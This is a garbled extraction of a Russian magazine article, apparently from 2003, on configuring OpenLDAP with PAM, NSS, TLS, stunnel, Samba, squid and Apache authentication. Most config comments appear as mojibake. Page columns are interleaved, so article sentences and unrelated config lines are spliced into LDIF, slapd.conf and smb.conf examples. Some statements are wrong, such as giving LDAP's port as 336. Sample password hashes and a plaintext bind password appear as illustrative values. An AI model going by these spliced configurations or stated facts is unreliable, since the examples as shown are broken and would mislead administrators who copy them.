# LDAP, êîòîðûé èíà÷å íå çàïóñòèòñÿ. Ïàïêà äîëæíà áûòü äîñòóïíà äëÿ ÷òåíèÿ è çà- таксис файлов для создания базы
# ïèñè òîëüêî ïîëüçîâàòåëþ, ïîä êîòîðûì ðàáîòàåò slapd, è èìåòü ìàñêó äîñòóïà 700. данных (я обозначаю комментарии
directory /var/lib/ldap
# Îïðåäåëåíèÿ ïåðâè÷íûõ è âòîðè÷íûõ èíäåêñîâ ÁÄ ìîæåò óñêîðèòü ïîèñê ïî ÁÄ символом #, но в реальном файле
#index objectClass eq этих комментариев быть не должно!):
index objectClass,uid,uidNumber,gidNumber eq
index cn,mail,surname,givenname eq,subinitial
# Ïðàâà äîñòóïà ïî óìîë÷àíèþ dn: dc=test,dc=ru
access to attr=userPassword # Óíèêàëüíûé êîíòåêñò èìåíè
by self write objectclass: dcObject
by anonymous auth # Êëàññ îáúåêòà – êîíòåéíåðíûé îáúåêò
by dn="uid=root,dc=test,dc=ru" write objectclass: organization
by * none # Òîò æå ñàìûé êîíòåêñò ìîæåò ïðåä-
# Çäåñü îïðåäåëÿåòñÿ äîñòóï ê àòðèáóòó ïàðîëü ïîëüçîâàòåëÿ. Ñàì ïîëüçîâàòåëü èìååò # ñòàâëÿòü ñîáîé ðàçëè÷íûå îáúåêòû
# ïðàâî çàïèñè, àíîíèìíîìó ïîëüçîâàòåëþ ïðåäîñòàâëÿåòñÿ âîçìîæíîñòü ïðîéòè o: test
# àóòåíòèôèêàöèþ (ïîñëå ýòîãî îí ïðåäñòàâëÿåò óæå äðóãîé îáúåêò è äîñòóïà ê ïàðî- # Èìÿ îðãàíèçàöèè
# ëÿì àíîíèìíîãî ïîëüçîâàòåëÿ íå ïðîèñõîäèò, êàê ìîæíî áûëî áû ïîäóìàòü), à ïîëü- dc: test
# çîâàòåëü ñ êîíòåêñòîì "uid=root,ou=people,dc=test,dc=ru" èìååò ïðàâî íà çàïèñü. # Òî æå ñàìîå, íî â ñèñòåìå
# Äðóãèå æå ïîëüçîâàòåëè äîñòóïà ê ïàðîëþ íå èìåþò íèêàêîãî. Ò.å., äðóãèìè ñëîâàìè, # ãëîáàëüíûõ èì¸í
# íèêòî, êðîìå àäìèíèñòðàòîðà è ñàìîãî ïîëüçîâàòåëÿ íå èìåþò äîñòóïà ê ïàðîëþ. # ---------------------------------
access to * dn: cn=admin,dc=test,dc=ru
by dn="uid=root,dc=test,dc=ru" write # Êîíòåêñò àäìèíèñòðàòîðà
by * read objectclass: organizationalRole
# Äîñòóï ê îñòàëüíûì ïîëÿì áàçû LDAP - âñå ìîãóò ÷èòàòü àòðèáóòû (êðîìå ïàðîëÿ, # Êëàññ – äîëæíîñòíîå ëèöî
# òàê êàê çàïðåò èìååò áîëåå âûñîêèé ïðèîðèòåò), à ïîëüçîâàòåëü ñ êîíòåêñòîì cn: admin
# root ìîæåò ïèñàòü âñ¸ ÷òî óãîäíî (à êòî æ åìó ïîìåøàåò ). # Èìÿ ÷åëîâåêà (ïñåâäîíèì)

76

#----------------------------------
dn: ou=users,dc=test,dc=ru
# Êîíòåêñò ãðóïïû ïîëüçîâàòåëåé
ou: users
# Çíà÷åíèå ãðóïïû
objectclass: top
objectclass: organizationalUnit
# Êëàññ ãðóïïà
#----------------------------------
dn: uid=null,ou=users,dc=test,dc=ru
# Êîíòåêñò êîíêðåòíîãî ïîëüçîâàòåëÿ
# èç /etc/passwd
uid: null
# Åãî ïîëüçîâàòåëüñêèé ïñåâäîíèì
cn: Neo
# Ðåàëüíûé ïñåâäîíèì
objectclass: account
# Êëàññ ïîëüçîâàòåëüñêèé ïðîôèëü
objectclass: posixAccount
# Êëàññ ïîëüçîâàòåëÿ POSIX
objectclass: top
objectclass: uidObject
# Ñàìàÿ ëó÷øàÿ îáîëî÷êà - zsh!
loginshell: /bin/zsh
# Âñå ñëåäóþùèå ïàðàìåòðû ñîâïàäàþò
# ñ àíàëîãè÷íûìè â /etc/passwd
uidnumber: 1000
gidnumber: 1000
homedirectory: /home/null
gecos: Neo
userpassword: $1$abcdvPbaLa6vs4ABab1N
Здесь, думаю, всё понятно. Но ведь
если у вас система уже настроена и
содержит порядка 8*1010 пользовате-
лей, то будет немного трудновато всё
это заново переписывать. Поэтому во
многих дистрибутивах есть пакет
openldap-migration, содержащий набор
скриптов для переноса существующих
файлов и баз сетевых служб в LDAP.
Если его нет, то посмотрите здесь:
http://www.padl.com. Данный пакет
представляет из себя набор скриптов
на Perl, обрабатывающий соответству-
ющие файлы и службы (/etc/passwd
(+shadow), /etc/hosts, /etc/profile, /etc/
services, NIS-службы). Использование
скриптов предельно просто. Вначале
надо исправить файл /usr/share/
openldap/migration/migrate_common.ph:
# Ïî÷òîâûé äîìåí ïî óìîë÷àíèþ
$DEFAULT_MAIL_DOMAIN = "test.ru";
# Èìÿ êîðíåâîãî îáúåêòà LDAP
$DEFAULT_BASE = "dc=test,dc=ru";
# Õîñò äëÿ ïðè¸ìà/ïåðåäà÷è ïî÷òû
# ïî óìîë÷àíèþ
$DEFAULT_MAIL_HOST = "mail.test.ru";
# Èñïîëüçóåì ðàñøèðåííûå ôàéëû ñõåì
$EXTENDED_SCHEMA = 1;
Далее выполняем:
migrate_base.pl > base.ldif
для создания структуры базы LDAP.
Для добавления данного файла к
№2(3), февраль 2003
базе можно использовать следую-
щий синтаксис:
ldapadd -x -D "cn=root,dc=test,dc=ru"
-W -f base.ldif
или же
slapadd -f base.ldif
для добавления записи в режиме
offline. Первый способ лучше, так
как позволяет проверить работу
LDAP в сети (фактически использу-
ются TCP-сокеты).
Далее выполняем миграцию того,
что нужно перенести в LDAP, например:
./migrate_hosts.pl /etc/hosts
hosts.ldif
Файл hosts.ldif будет содержать
примерно следующее (в файле /etc/
hosts было 192.168.1.23 work.test.ru
work):
dn: cn=work.test.ru,ou=Hosts,
dc=test,dc=ru
objectClass: top
objectClass: ipHost
objectClass: device
ipHostNumber: 192.168.1.23
cn: work.test.ru
cn: work
Удобно, не так ли? Можно проде-
лать подобное со всем, для чего уже
написаны скрипты (можно и самому,
в конце концов, написать! Что нам
этот Perl). Кстати, вот ещё о чём я
забыл: при переносе /etc/passwd
нужно установить переменную окру-
жения ETC_SHADOW:
root@ldap # ETC_SHADOW=/etc/shadow
./migrate_passwd.pl /etc/passwd
passwd.ldif
И ещё: не забывайте добавлять
файлы .ldif f к базе с помощью
ldapadd!
Если всего этого делать нет же-
лания, то можно применить один из
shell-скриптов migrate_all_[on|off]line,
которые позволяют в интерактивном
режиме перенести все существую-
щие стандартные конфигурационные
файлы в LDAP.
Ну вот, база создана, надо бы её
проверить. Поищем в ней объекты с
заданным атрибутом, пускай пому-
чается:
безопасность
ldapsearch -LL -H ldap://localhost
-b"dc=test,dc=ru" -x "(uid=null)"
#
# filter: (uid=null)
# requesting: ALL
#
# null, Users, test, ru
dn: uid=null,ou=Users,dc=test,dc=ru
uid: null
cn: Neo
objectClass: account
objectClass: posixAccount
objectClass: top
objectClass: uidObject
loginShell: /bin/zsh
uidNumber: 1000
gidNumber: 1000
homeDirectory: /home/null
gecos: Neo
# search result
search: 2
result: 0 Success
# numResponses: 1
# numEntries: 1
Естественно, что в поиске можно
использовать регулярные выражения.
«Ну и зачем мы это делали?» – зак-
ричат многие и будут неправы. На са-
мом деле это уже хорошо: вся инфор-
мация о системе хранится в древес-
ном виде в БД. Там её можно искать,
читать, писать, ставить нужные пра-
ва. Идея просто супер! Причём всё это
хозяйство без проблем достаётся из
сети, реестр виндов отдыхает. Это
сказка для любителей Novell и ещё
один повод перейти на Linux даже в
крупных сетях. Извините, оговорился,
на *nix, так как openldap работает
практически на всех *nix системах, а
клиенты есть под любую ось. Ну а те-
перь разберёмся, как организовать
связку с другими программами.
Настройка клиентов
и аутентификации
Вначале нужно создать специального
пользователя, который мог бы читать
пароли других пользователей (это, ко-
нечно, плоховато для безопасности, но
ведь пароль-то можно придумать ка-
кой-нибудь зловещий, например SHA1
хеш от результата crypt над строкой
77
 безопасность
$%YJH&*&*jszZn7867wey8YT6yeuwe%%&^&&*.
Этот пользователь понадобится в бу-
дущем для клиентов LDAP, для выпол-
нения аутентификации (ведь клиен-
там надо прочитать пароль, чтобы его
сравнить с чем-то). Назовём этого
пользователя proxy и сделаем следу-
ющее:
Добавим его в LDAP:
dn: cn=proxy,dc=test,dc=ru
cn: prox
sn: proxy
objectclass: top
objectclass: person
userPassword:
{MD5}Xr4ilOzQ4PCOq3aQ0qbuaQ==
Затем предоставим ему права чте-
ния пароля в sldap.conf:
access to attr=userPassword
by self write
by anonymous auth
by dn="uid=root,dc=test,dc=ru" write
by dn="cn=proxy,dc=test,dc=ru" read
by * none
Далее настроим наших клиентов в
файле /etc/ldap.conf для *nix клиентов,
для других ОС необходимо смотреть
документацию к софту, работающе-
му с LDAP-сервером:
# Ñåðâåð LDAP – IP-àäðåñ ñåðâåðà èëè
# åãî èìÿ, íàõîäÿùååñÿ â /etc/hosts,
# èëè â DNS íà óäàë¸ííîì óçëå
host 127.0.0.1
# Îñíîâíîé ñóôôèêñ äîëæåí ñîâïàäàòü
# ñ ñóôôèêñîì â slapd.conf
base dc=test,dc=ru
# Ýòî òèïà root, òî÷íåå, íàø ãîðÿ÷î
# ëþáèìûé proxy, ñäåëàíî â öåëÿõ
# áåçîïàñíîñòè è íå ïîçâîëÿåò ñàìîìó
# ïîëüçîâàòåëþ èçìåíèòü ïàðîëü.
rootbinddn cn=proxy,dc=test,dc=ru
scope one
# Ýòî ôèëüòð äëÿ ïîèñêà
# ïîëüçîâàòåëüñêèõ çàïèñåé
pam_filter objectclass=posixaccount
# Àòðèáóò, îïðåäåëÿþùèé èìÿ
# ïîëüçîâàòåëÿ è åãî ãðóïïû
# äëÿ pam-ìîäóëÿ
pam_login_attribute uid
pam_member_attribute gid
pam_template_login_attribute uid
# Òèï ïàðîëÿ - øèôðîâàíèå UNIX crypt,
# êñòàòè, øèôðîâàíèå LDAP è øèôðî-
# âàíèå UNIX – íåñîâìåñòèìû (crypt
# îçíà÷àåò èìåííî øèôðîâàíèå unix)!
pam_password crypt
# Áàçîâûå dn äëÿ ïîèñêà ðàçëè÷íûõ
# îáúåêòîâ, one - ýòî îáëàñòü ïîèñêà.
# Äàííûå ïàðàìåòðû èñïîëüçóþòñÿ nss.
nss_base_passwd
ou=People,dc=test,dc=ru?one
nss_base_shadow
ou=People,dc=test,dc=ru?one
nss_base_group
ou=Group,dc=test,dc=ru?one
nss_base_hosts
ou=Hosts,dc=test,dc=ru?one
После этого вы должны создать
файл, содержащий пароль коварного
proxy в открытом(!) виде. Ну и конеч-
78
но же, запретить чтение/запись
всем, кроме root (chmod 0600 chown
root:root). В принципе то же самое,
что и /etc/shadow. Но беда, что па-
роль хранится в открытом виде. С
другой стороны, получение пароля
proxy само по себе ничего не даёт:
нельзя менять пароли, но прочитать
их можно (хотя толку мало, если па-
роли дикие). Но если proxy не может
менять пароль, то никто не сможет
изменить свой пароль, иначе как вы
себе это представляете. Ну а даль-
ше надо настраивать pam, чтоб он
ходил на LDAP-сервер за паролями.
Чтобы включить возможность аутен-
тификации приложений через LDAP,
необходимо установить модуль PAM
pam-ldap. После этого можно вклю-
чить в файлы /etc/pam.d (эти файлы
содержат список способов аутенти-
фикации для определённых прило-
жений: login, passwd, pop, smtp...)
следующие строчки:
auth sufficient /lib/
security/pam_ldap.so
account sufficient /lib/
security/pam_ldap.so
password sufficient /lib/
security/pam_ldap.so
#(ýòà ñòðî÷êà íóæíà íå âåçäå, íàäî
# ñìîòðåòü, â êàêèõ ôàéëàõ îíà óæå
# åñòü)
Особо надо отметить файл system-
auth, здесь нужно указать некоторые
вещи:
#%PAM-1.0
auth required /lib/security/
pam_env.so
auth sufficient /lib/security/
pam_unix.so likeauth nullok
auth sufficient /lib/security/
pam_ldap.so use_first_pass
auth required /lib/security/
pam_deny.so
account required /lib/security/
pam_unix.so
account [default=bad success=ok
user_unknown=ignore \
service_err=ignore
system_err=ignore] /lib/security/
pam_ldap.so
password required /lib/security/
pam_cracklib.so retry=3
password sufficient /lib/security/
pam_unix.so nullok use_authtok \
md5 shadow
password sufficient /lib/security/
pam_ldap.so use_authtok
password required /lib/security/
pam_deny.so
session required /lib/security/
pam_limits.so
session required /lib/security/
pam_unix.so
session optional /lib/security/
pam_ldap.so
Модуль LDAP является обычно
дополнительным компонентом и не
является необходимым, и поиск идёт
вначале в локальных файлах, а по-
том уж в ldap (так как стоит он пос-
ле других способов аутентифика-
ции). Таким образом, можно доба-
вить аутентификацию через ldap в
любой модуль pam, а последний ис-
пользуется множеством приложений
для аутентификации клиента.
Ещё одной интересной возмож-
ностью ldap является возможность
проверки хоста. Часто нельзя, что-
бы любой человек, занесённый в
базу ldap, мог пользоваться вашим
компом (мало ли чего, вдруг это на-
чальник). Поэтому можно добавить
к учётным записям пользователей
хосты, на которые эти пользовате-
ли могут логиниться (повторяю: не
откуда может поступать запрос, а
куда они мог ут входить, то есть
нельзя удалённо пройти аутентифи-
кацию на машине X, если это не раз-
решено). Для этого необходимо до-
бавить к каждой записи пользовате-
ля следующие атрибуты:
host: name_of_host1
host: name_of_host2
...
host: name_of_hostn
Для модификации базы данных
можно воспользоваться программой
ldapmodify:
ldapmodify -H ldap://localhost -D
"cn=root,dc=test,dc=ru" -x -W -f host-
auth.ldif
А сам файл host-auth.ldif должен
содержать следующее:
dn: uid=user_name, ou=People,
dc=test, dc=ru
changetype: modify
add: host
host: name_of_host1
host: name_of_host2
host: name_of_hostn
Придётся повторить это для каж-
дого пользователя! Разумнее напи-
сать скрипт, но я возложу это на
ваши могучие плечи. После этого
надо сделать ещё изменения в /etc/
ldap.conf. В данном файле необхо-
димо указать, что нужно ещё смот-
реть атрибут host:
pam_check_host_attr yes

Защита LDAP
при помощи SSL
Как я уже говорил, в LDAP существует
возможность защиты данных, переда-
ваемых по сети. При этом использует-
ся два метода: TLS и SASL. Первый из
них не меняет порта, на котором слу-
шает LDAP (336), а просто организует
аутентификацию асимметрическим
шифрованием, SASL же меняет порт
LDAP на ldaps:// и соединение идёт по
другому механизму: через туннель
SASL. TLS намного проще в настройке,
поэтому я расскажу именно о нём. Для
начала надо сгенерировать серверную
пару ключей асимметрического шиф-
рования. Для этого в Linux удобно вос-
пользоваться единым центром серти-
фикации OpenSSL (об этом я уже пи-
сал на страницах январского номера):

создаем rsa ключ длиной 1024
бита и сохраняем его в файле
ldap.key:
$ openssl genrsa -out ldap.key
1024

создаём запрос на сертификацию:
$ openssl req -new -config .cfg
-key ldap.key -out ldap.csr

создаём сертификат, по которому
будем доверять (CACertificate); вна-
чале делаем ключ длиной 2048 бит:
$ openssl genrsa -des3 -out
ca.key 2048

создаём self-signed сертификат
сроком действия на год на основе
сгенерированного ключа:
$ openssl req -new -x509 -days
365 -key ca.key -out ca.cert

теперь на основе созданного для
LDAP ключа и доверенного сер-
тификата создаём сертификат
LDAP:
$ openssl x509 -req -in
ldap.csr -out ldap.cert -CA
ca.cert -CAkey ca.key -
CAcreateserial \
-days 365 -extfile .cfg
При этом файл конфигурации
.cfg должен содержать следующие
расширения:
№2(3), февраль 2003
[ v3_req ]
subjectAltName = email:copy
basicConstraints = CA:false
nsComment = "LDAP server certifica-
te"
nsCertType = server
Немного страшновато выглядит, но
в ходе всех этих действий создаются
два сертификата: доверенный серти-
фикат и подписанный им сертификат
сервера. Таким образом, сервер LDAP
сможет проверить правильность свое-
го сертификата через доверенный сер-
тификат. Кстати, если у вас уже есть
доверенные сертификаты, то можно
воспользоваться ими: просто пропус-
тите второй и третий шаг, и на четвер-
том шаге введите имя своего доверен-
ного сертификата (можно также вос-
пользоваться моим скриптом CA).
Итак, после всех этих действий
перемещаем сертификаты и ключ
сервера LDAP (ldap.key) куда-нибудь
в /etc/ssl/ldap (принято хранить все
ключи и сертификаты, созданные
openssl в /etc/ssl) и делаем их доступ-
ными для чтения только владельцу:
#chmod 0400 /etc/ssl/ldap/*
è ìåíÿåì âëàäåëüöà íà ldap
#chown ldap:ldap /etc/ssl/ldap/*
Настройка сервера предельно
проста: необходимо просто прописать
пути к сертификатам и ключам в фай-
ле slapd.conf следующим образом:
# Ñåðòèôèêàò ñåðâåðà
TLSCertificateFile /etc/ssl/ldap/
ldap.cert
# Êëþ÷ ñåðâåðà
TLSCertificateKeyFile /etc/ssl/
ldap/ldap.key
# Äîâåðåííûé ñåðòèôèêàò
TLSCACertificateFile /etc/ssl/ldap/
ca.cert
Сервер можно конфигурировать и
альтернативным методом – через тун-
нель stunnel или ssh. Обычно приме-
няют stunnel, но для начала опять же
генерируют сертификат сервера (при
этом сам LDAP не должен быть на-
строен для поддержки SSL, т.к. stunnel
будет заменять встроенные механиз-
мы SSL ldapa). После генерации сер-
тификата делаем следующее:
#stunnel -r ldap -d 636 -p /etc/
ssl/stunnel/stunnel.pem
Записываем эту команду в один из
init-файлов и добавляем правило
iptables для отбрасывания сетевого
безопасность
трафика с порта 389 с целью повы-
шения безопасности (это запрещает
доступ по сети к серверу ldap без ме-
ханизма ssl). Для генерации сертифи-
ката в данном случае можно приме-
нить скрипт для генерации stunnel сер-
тификатов, который обычно поставля-
ется вместе с stunnel. Можно также
применить следующее:
$ openssl req -new -x509 -days 365
-nodes -config stunnel.cnf \
-out stunnel.pem -keyout stunnel.pem
$ openssl gendh 512 >> stunnel.pem
для генерации self-signed сертифика-
та и параметров для ключей Дифле-
мана-Хельмана. На самом деле через
туннель у меня все работало просто
на ура, а встроенные механизмы ра-
ботали несколько странно, хотя я пе-
речитал все маны и руководства, но
это не помогло...
Теперь перезапускаем slapd и на-
страиваем клиентов. Для настройки
клиентов надо прописать в файле
ldap.conf следующие строки:
# Àóòåíòèôèêàöèÿ ÷åðåç TLS
ssl start_tls
# Ïî óìîë÷àíèþ êëèåíò ïûòàåòñÿ
# èñïîëüçîâàòü îáû÷íîå ñîåäèíåíèå,
# çàêîììåíòèðîâàâ ñëåäóþùóþ ñòðî÷êó,
# ìû ñòàâèì æèðíûé êðåñò íà åãî
# áåçîáðàçèÿõ
#ssl off
Интеграция
Теперь наш LDAP-сервер работает за-
мечательно (или не работает совсем,
что зависит от /dev/hands) и его уже
можно использовать в сети, но мно-
гие хотели бы заменить старые сис-
темы аутентификации на LDAP. Са-
мое время, чтобы рассказать о LDAP
и NIS. NIS (службы сетевой информа-
ции) широко используются для едино-
го управления паролями в сети. NIS –
это более старый и менее защищён-
ный протокол аутентификации. Воз-
можности LDAP значительно шире, и
поэтому имеет смысл перенести NIS
в LDAP, чтобы использовать возмож-
ности последнего и устоявшиеся на-
стройки первого (не вновь же всё руч-
ками писать), благо в пакете
migrationtools есть скрипты для миг-
рации NIS и NISPLUS:
migrate_all_nisplus_on[off]line.sh
migrate_all_nis_on[off]line.sh
79
 безопасность
Я уже рассказал о методах интег-
рации существущей системы и LDAP
через PAM (встраиваемые модули
аутентификации), а сейчас настало
время рассказать ещё об одном ме-
ханизме аутентификаци: NSS (дос-
ловно выбор службы имён). NSS вы-
бирает, какой тип аутентификации
будет использоваться при запросе
клиентом определённого файла или
механизма (с nss интегрировано
множество программ, например,
SAMBA). Для настройки NSS исполь-
зуется файл /etc/nsswitch.conf. Его
синтаксис предельно прост: имя сер-
виса (shadow passwd hosts) и далее
список параметров (в порядке убы-
вания приоритета), определяющих
возможные сетевые службы. Вот,
например, файл nssswitch.conf с
моей домашней машины:
# Legal entries are:
#
# nisplus or nis+
# Èñïîëüçîâàòü 3-þ âåðñèþ NIS(NIS+)
# nis or yp
# Èñïîëüçîâàòü 2-þ âåðñèþ NIS(YP)
# dns
# Èñïîëüçîâàòü DNS
# files
# Èñïîëüçîâàòü ëîêàëüíûå ôàéëû
# ldap
# Èñïîëüçîâàòü LDAP-áàçó
# [NOTFOUND=return]
# Åñëè íå íàéäåíà èíôîðìàöèÿ,
# îñòàíîâèòü ïîèñê
# пасные методы аутентификации
passwd: files nisplus nis
shadow: files nisplus nis
group: files nisplus nis
hosts: files nisplus nis dns
networks: files
protocols: files
services: files
netgroup: nisplus
Чтобы использовать ldap, просто до-
бавьте в нужные места данный метод.
Если вы хотите использовать только
ldap, то поставьте после слова «ldap»
строчку [NOTFOUND=return], чтобы по-
иск прекращался при отсутствии эле-
мента в базе LDAP. Например:
# Èùåì âíà÷àëå â ëîêàëüíûõ ôàéëàõ,
# à ïîòîì â LDAP
passwd: files ldap
shadow: files ldap
group: files ldap
hosts: files dns ldap
Учтите ещё одну особенность: я бы
не рекомендовал использовать ldap
для оперделения хостов, т.к. он будет
пытаться найти имя удалённого кли-
80
ента в /etc/hosts, а потом начнёт пе-
рерывать какие-то данные, что вызы-
вает нехилую задержку ~30 секунд
(если имени нет в hosts). Так что луч-
ше использовать старый добрый DNS
(тем более, записи DNS можно хра-
нить в LDAP, но об этом немного по-
зднее). К тому же, когда я поставил у
себя проверку хостов первоначально
через LDAP, то последний повис на-
глухо, т.к. вызывает рекурсивно
gethostbyname() для определения сво-
его адреса.
Хорошо, nss мы настроили, теперь
примемся за SAMBA. Честно говоря,
SAMBA, на мой взгляд, немного кри-
вая софтина (а как же: работает с та-
кими замечательными ОС), но с вер-
сии 2.2.6 вопросы, касающиеся LDAP,
вроде ушли из мейл-листа, что наво-
дит на радужные мечтания (кстати,
SAMBA 2.2.6 требует SP3 у Win2k кли-
ентов). Для компиляции сервера с
LDAP наберите ./configure –with-
ldapsam. SAMBA имеет возможность
указания сервера LDAP и базового dn
поиска прямо в smb.conf. Для этого су-
ществует несколько опций:

ldap server – основной параметр,
определяет адрес LDAP-сервера;

ldap ssl – параметр, указываю-
щий надо ли использовать безо-
(нужен всегда!). Имеет значение
on для работы через SSL (порт
636), start tls для обычной аутен-
тификации через tls (389 порт) и
no для посылки данных в откры-
том виде (также порт 389);

ldap admin dn – параметр, опре-
деляющий запись, имеющую пра-
ва доступа к паролям SAMBA;

ldap suffix – основной суффикс
базы данных LDAP;

ldap filter – фильтр, по которому
SAMBA ищет свои объекты, на-
пример:
ldap filter =
"(&(uid=%u)(objectclass =
sambaAccount))":
имя пользователя совпадает с
логином виндов, а тип объекта –
профиль SAMBA;

ldap port – если ваш сервер LDAP
висит на другом порту, чем это
назначено по умолчанию (см. па-
раметр ldap ssl), то здесь это
можно указать.
Приведу простой пример настрой-
ки SAMBA с LDAP:
[global]
# Þçåðû äîëæíû çàëîãèíèòüñÿ íà
# ñåðâåð
security = user
# Åñòåñòâåííî, øèôðóåì ïàðîëè
encrypt passwords = yes
netbios name = Linux
workgroup = NET
# Ïàðàìåòðû LDAP
# Îïðåäåëÿåì àäìèíîâñêèé dn.
# Ïàðîëü ê íåìó äîëæåí äîáàâëÿòüñÿ
# íåïîñðåäñòâåííî smbpasswd -w.
# Ïîñëå ñìåíû dn àäìèíà ïàðîëü
# òîæå íàäî ñìåíèòü!
ldap admin dn = "cn=ntadmin,
ou=people,dc=test,dc=ru"
# Îïðåäåëÿåì ñåðâåð LDAP
ldap server = ldap.test.ru
# Çàõîäèì íà LDAP-ñåðâåð ÷åðåç TLS
ldap ssl = start tls
# Îïðåäåëÿåì ïîðò(õîòÿ â äàííîì
# ñëó÷àå ýòî íåîáÿçàòåëüíî)
ldap port = 636
# Îïðåäåëÿåì ñóôôèêñ áàçû äàííûõ
# ldap
ldap suffix = "ou=people,dc=test,
dc=ru"
Кроме этого, естественно, надо
завести админа SAMBA в LDAP и
обеспечить ему соответствующие
права доступа в slapd.conf (можно
для этой цели использовать рута –
это тоже сработает):
access to attrs=lmPassword,ntPassword
by dn="cn=ntadmin, ou=people,
dc=test, dc=ru" write
by * none
После настройки администраторс-
кой записи в ldap SAMBA может коррек-
тно работать с деревом директорий.
При правильной компиляции (с флагом
–with-ldapsam) smbpasswd будет добав-
лять пользователей и машины в ката-
лог LDAP, при этом smbpasswd будет
использовать passwd и groups из
nsswitch (при правильной настройке nss
можно также брать всю инфу из LDAP,
т.к. SAMBA обращается к passwd через
nss), добавляем пользователей:
# smbpasswd -a <username>
добавляем машину (для SAMBA-кон-
троллера домена):
# smbpasswd -m -a <mach_name>$
После этого проверяем результат:

# ldapsearch -ZZ -H localhost -b
"o=smb, dc=test, dc=ru" "uid=pc1$"
--
dn: uid=icb$, o=smb, dc=test, dc=ru
objectClass: sambaAccount
uid: pc1$
pwdLastSet: 0
logonTime: 0
logoffTime: 2147483647
kickoffTime: 2147483647
pwdCanChange: 0
pwdMustChange: 2147483647
displayName: MustdiePC
cn: PC1
rid: 2054
primaryGroupID: 1201
lmPassword:
56D989A3C45BBAD3462E8109C329E116
ntPassword:
56D989A3C45BBAD3462E8109C129E116
acctFlags: [W ] squid_ldap_auth, представляющий со-
--
Далее вы можете изменять инфор-
мацию профиля пользователя. Напри-
мер, весьма полезны атрибуты
scriptPath (скрипт, выполняющийся
при логине клиента), homeDrive (диск
домашней директории), profilePath
(путь к профилю), pwdMustChange (не-
обходимость смены пароля пользова-
телем). Для изменения базы данных
LDAP на лету существует команда
ldapmodify, которая, как и команда
ldapadd, работает с файлами ldiff. Я
не буду подробно описывать формат
этого файла, а просто приведу при-
мер изменения нужных атрибутов:
dn: uid=001, o=smb, dc=test, dc=ru
changetype: modify
replace: profilePath
profilePath: \\%N\profiles\user1
- # âàòüñÿ äëÿ äîñòóïà ê ïðîêñè
replace: scripthPath
scripthPath: 001.bat
- # ïðîø¸ë ïðîâåðêó
replace: homeDrive
homeDrive: Z:
- http_access deny all
replace: pwdCanChange
pwdCanChange: 0
- Теперь о возможности работы с
replace: pwdMustChange
pwdMustChange: 0
- mod_auth_ldap, который позволяет
replace: primaryGroupID
primaryGroupID: 513
- через LDAP-сервер. Здесь я опять же
Для добавления информации в
базу воспользуйтесь командой:
$ ldapmodify -H localhost -D
"<admin_DN>" -W -ZZ -l modifi-
cation.ldif
(Примечание: в руководствах гово-
рится, что надо использовать ключ -f,
а не -l, но у меня по-другому не рабо-
тало, хотя, наверное, я что-то делаю
не так).
Любителям готовых примеров по-
советую сходить на http://www.unav.es/
№2(3), февраль 2003
cti/ldap-smb/ldap-smb-2_2-howto.html –
отличный пример настройки контрол-
лера домена с LDAP (не буду же я
здесь приводить все эти конфиги, а
мои собственные исторической ценно-
сти не имеют).
Напоследок скажу ещё об одном
приложении, работающем непосред-
ственно с LDAP, – это squid. Для него
существует модуль, позволяющий вы-
полнить http-аутентификацию, ис-
пользуя базу LDAP. В исходных тек-
стах сквида можно найти модуль,
бой внешнюю программу, его исход-
ные тексты находятся в каталоге
auth_modules/LDAP. Скомпилировав
её обычным образом (./configure ->
make -> make install), получаем
обычный исполняемый файл
squid_ldap_auth. После установки
модуля добавляем такие строчки в
squid.conf:
authenticate_program /usr/squid/
libexec/squid/squid_ldap_auth -b
dc=test,dc=ru localhost
Вначале указываем путь к испол-
няемому файлу, затем основной суф-
фикс базы LDAP и LDAP-сервер
(localhost у меня). Далее в squid.conf
добавляем права доступа(ACL):
# Çàñòàâëÿåì âñåõ àóòåíòèôèöèðî-
acl password proxy_auth REQUIRED
# Âîçìîæåí äîñòóï http âñåì, êòî
http_access allow password
# Îñòàëüíûõ øëåì ïîãóëÿòü
LDAP апача. Апач имеет модуль
производить http-аутентификацию
ограничусь только примером типич-
ной настройки аутентификации че-
рез ldap:
httpd.conf
# Çàãðóæàåì ìîäóëü àóòåíòèôèêàöèè.
# Îáû÷íî íàõîäèòñÿ â extramodules
LoadModule auth_ldap_module
extramodules/auth_ldap.so
AddModule auth_ldap.c
# Îïðåäåëåíèÿ àóòåíòèôèêàöèè ÷åðåç
# ldap äëÿ êîíêðåòíîãî êàòàëîãà
<Directory /var/www/secure>
# Ýòî îñíîâíîé êîíòåêñò äëÿ ïîèñêà
# ñîîòâåòñòâèÿ ïîëüçîâàòåëÿ è ïàðîëÿ
# â áàçå LDAP, åñëè äàííàÿ îïöèÿ íå
# óêàçàíà, íî èñïîëüçóåòñÿ àíîíèìíûé
# äîñòóï (÷òî îáû÷íî çàïðåùàåòñÿ â
безопасность
# öåëÿõ áåçîïàñíîñòè).
AuthLDAPBindDN
cn=proxy,dc=test,dc=ru
# Ïàðîëü äëÿ îñíîâíîãî êîíòåêñòà
AuthLDAPBindPassword secret
# Âêëþ÷åíèå ìåõàíèçìà TLS äëÿ äîñòóïà
# ê ñåðâåðó ldap (ïî óìîë÷àíèþ off)
AuthLDAPStartTLS on
# Îñíîâíîé ïàðàìåòð, êîòîðûé
# îïðåäåëÿåò ñåðâåð ldap, dn ïîèñêà,
# àòðèáóòû è ôèëüòð, ïî êîòîðîìó
# âûïîëíÿåòñÿ àóòåíòèôèêàöèÿ:
# ldaps://host:port/
basedn?attribute?
# scope?filter, ãäå basedn -
áàçîâûé
# dn äëÿ ïîèñêà (èùåòñÿ òîëüêî â äàí-
# íîé âåòâè äåðåâà è å¸ ïîòîìêàõ)
# attribute – ñïèñîê àòðèáóòîâ,
# ðàçäåëÿåìûõ çàïÿòîé, ïî êîòîðûì
# ïðîèçâîäèòñÿ ïîèñê (ïî óìîë÷àíèþ
# èñïîëüçóåòñÿ àòðèáóò uid)
# scope - ôëàã, îïðåäåëÿþùèé òèï
# âîçâðàùàåìûõ çíà÷åíèé one - èùåòñÿ
# ïåðâîå âûðàæåíèå, sub - èùóòñÿ âñå
# âûðàæåíèÿ, ñîîòâåòñòâóþùèå
# ôèëüòðó (ïðèíÿòî ïî óìîë÷àíèþ).
# filter - ñòðîêà, îïðåäåëÿþùàÿ
# ôèëüòð ïîèñêà ýëåìåíòîâ ldap,
# çàêëþ÷àåòñÿ â ñêîáêè, ïî óìîë÷àíèþ
# ðàâíà (objectclass=*). Ôèëüòð ìîæåò
# ñîäåðæàòü ëîãè÷åñêèå âûðàæåíèÿ |
# è & êîòîðûå äîëæíû ñòîÿòü íå ìåæäó
